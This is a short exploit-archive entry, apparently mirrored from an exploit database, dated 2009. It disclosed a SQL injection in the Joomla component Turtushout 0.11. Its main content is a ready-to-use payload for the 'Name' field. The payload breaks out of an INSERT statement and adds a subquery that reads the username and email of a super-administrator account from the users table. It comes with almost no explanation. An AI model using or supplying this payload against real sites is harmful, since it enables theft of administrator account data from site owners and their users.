[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Joomla Component Turtushout 0.11 (Name) SQL Injection Vulnerability
# Published : 2009-09-14
# Author : jdc
# Previous Title : Modern Script <= 5.0 (index.php s) SQL Injection Vulnerability
# Next Title : Joomla Component AlphaUserPoints SQL Injection Exploit


Joomla Component Turtushout 0.11SQL Injection

'Name' field SQL injection:

test', '0.0.0.0' ), ( 'test', ( SELECT CONCAT( username, 0x20, email ) FROM #__users WHERE gid=25 limit 1 ), '2009-08-07 13:52:38', 0, 'test', '0.0.0.0' ) -- '

jdc 2009 

# www.Syue.com [2009-09-14]